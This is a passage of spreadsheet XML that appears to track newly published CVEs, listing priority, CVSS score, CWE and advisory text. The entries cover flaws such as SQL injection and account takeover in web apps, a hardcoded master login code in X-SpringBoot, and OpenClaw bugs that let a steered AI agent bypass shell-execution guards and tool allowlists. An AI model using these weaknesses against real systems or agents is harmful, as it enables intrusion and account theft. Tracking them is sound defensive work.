          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/themes_standard_pages.php validates uploaded logo content by MIME type but reuses the attacker-controlled extension from std_pgs_logo when constructing the stored filename. An authenticated administrator can upload image content with a server-executable final extension, causing the file to be placed in the web-accessible logo directory and executed when requested if the web server handles that extension. This can permit arbitrary command execution, data disclosure, modification, persistence, and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42322</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62262</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. In 17.0.0beta1 and earlier, when rating is enabled, an unauthenticated guest can call pwg.images.filteredSearch.create with a crafted ratings[] value and then open the returned search URL. include/ws_functions/pwg.images.php stores the unvalidated value in the search rules, and include/functions_search.inc.php integer-casts only the lower rating bound while concatenating the raw value as the SQL upper bound. This allows error-based or blind extraction of database information and database-dependent time delays through the public search flow. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62262</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84458</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when the "Automatic account link on initial logon" setting is enabled, Zammad binds an incoming third-party (SSO) identity to an existing local account by matching the email address the identity provider reports, without verifying that the provider actually confirmed ownership of that email. An attacker who controls any identity at a configured provider, including, by default, any Azure AD tenant via Zammad's multi-tenant Microsoft 365 /common app registration, can set that identity's email to a victim's address, authenticate, and be logged in as the victim. This bypasses the victim's local password entirely and affects any existing account, including agents and administrators. Zammad will honor the xms_edov ID token claim when email verification is required in the Microsoft 365 setting, treating a missing claim as unverified. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84458</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89055</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.120.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to permanently delete arbitrary attachments from the Media Library — including administrator-owned product images, logos, and documents — by injecting their IDs into a review that is later trashed and purged. Exploitation requires a public review-form link (a 13-hex formId distributed to customers via e-mail), which exposes the nonce needed to reach the handler without any WordPress account or session.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89055</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93399</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>The Bookly plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 28.2 via the 'bookly_get_form_id', 'bookly_render_complete', 'bookly_add_to_calendar' and 'bookly_rollback_order' AJAX actions. This is due to the 'bookly_get_form_id' handler blindly storing the attacker-controlled 'order_id' from the submitted form_data into a new booking session, which the 'bookly_render_complete' handler then trusts to look up and return the corresponding Order's secret token without verifying that the current session created that order. This makes it possible for unauthenticated attackers to enumerate sequential order IDs, disclose other customers' order tokens, retrieve calendar/appointment information via 'bookly_add_to_calendar' and permanently delete arbitrary non-completed bookings via 'bookly_rollback_order', which cascade-deletes the customer_appointment and (when no other customers are attached) the underlying appointment.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93399</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97063</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 returns login verification codes in HTTP responses from unauthenticated endpoints GET /sys/mobile/code and GET /sys/email/code without sending them to account owners. Attackers can request codes using known mobile numbers or email addresses, read them from responses, and authenticate as victims via POST /sys/emailOrMobileLogin/login to hijack accounts.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97063</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97064</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 ships with a hardcoded static master login verification code 172839 enabled by default in the database seed. Unauthenticated attackers can authenticate as any user by submitting the public master code to the emailOrMobileLogin endpoint with a known email or mobile number.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97064</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100520</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Laranode versions before 1.2.1 contain a path traversal vulnerability in the POST /filemanager/upload-file endpoint that allows authenticated users to write arbitrary files outside their home directory. Attackers can supply directory traversal sequences in the path parameter to write PHP files into other tenants' web roots and execute code as those tenants.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100520</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100544</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>openclaw's @openclaw/voice-call package before 2026.8.1 launches the configured agent for classic inbound voice calls without propagating the caller's identity or non-owner status. As a result, owner-only tool filtering can fail open and expose the agent's normal tool authority to a remote caller. A caller who is admitted by the configured inbound-call policy (open, pairing, or allowlist) on a deployment with inbound calling enabled can therefore drive tools intended for the trusted owner, potentially reading data, modifying files, executing commands, or controlling connected services depending on the agent's configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100544</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100552</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 does not correctly enforce per-chat tool policies for Codex app-server runtime tools. A conversation-level tools.allow rule filtered OpenClaw tools but did not restrict the shell, process, file, and patch tools owned by the Codex runtime. When a lower-trust conversation was assigned to a Codex runtime and restricted with a per-chat tool allowlist, a participant able to trigger that agent could still reach native command and file tools, bypassing the configured allowlist. The practical impact depends on the runtime's host permissions and sandbox configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100552</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100580</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 improperly handles case sensitivity in the model-facing cron tool: a mixed-case payload kind can pass the agent-facing shell-execution guard and later normalize into a command job. An actor able to steer a tool-enabled agent can therefore create a persistent cron job that executes attacker-selected commands with the privileges of the OpenClaw process user, resulting in access to host files and credentials and impact to scheduled service availability. The issue is limited to cron jobs created or edited through the model-facing cron tool; direct CLI and authorized Gateway scheduling surfaces are trusted operator controls. Fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100580</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100587</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 fail to properly validate owner authorization in the Codex computer-use installation command. Non-owner channel senders can install arbitrary plugins and execute MCP processes with OpenClaw user privileges, affecting host confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100587</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100599</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions 2026.5.1 through 2026.7.0 fail to apply the configured exec approval path to Google Meet node commands. The googlemeet.chrome command accepts caller-supplied audio command arrays and executes them on a paired node without going through the normal system.run approval flow. In deployments with the Google Meet plugin enabled, a paired Chrome node, and the googlemeet.chrome node command allowed, a tool-enabled agent able to invoke that command can execute attacker-selected processes on the paired node, impacting files, credentials, browser profiles, and availability on that node. The issue is fixed in 2026.7.1; as a workaround, remove googlemeet.chrome from allowed node commands or disable the Google Meet plugin.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100599</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19804</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls &amp; Member Access Subscriptions plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 260814 via the 'first_name' parameter parameter. This is due to insufficient sanitization of the first_name parameter via esc_refs(), which strips only regex backreferences and not PHP tags, before substitution into the eval'd Signup Tracking Codes template, combined with disclosure of the site-global proxy verification key that allows PayPal postback verification to be bypassed. This makes it possible for unauthenticated attackers to execute code on the server. Successful exploitation requires that the site administrator has configured a Signup Tracking Codes template containing the %%first_name%% placeholder (a documented, GUI-supported feature) and that the attacker has obtained the site-global proxy verification key, which is exposed in plaintext in the JSON response of any PayPal Checkout AJAX request on the target site.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19804</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61525</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.2 and 7.1.0, zammad's session management for websocket and long-polling connections is susceptible to a path traversal attack. Session identifiers supplied by the client are insufficiently validated before being used to construct internal file paths. When the file-based session store is active (the default configuration), an authenticated attacker can manipulate the session identifier to reference locations outside the intended storage directory, leading to the deletion of arbitrary files and directories on the server. Exploitation requires only a low-privilege authenticated session and a single crafted request. Instances configured to use the Redis-based session store are not affected. This issue is fixed in versions 7.0.3 and 7.1.1.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61525</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89426</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
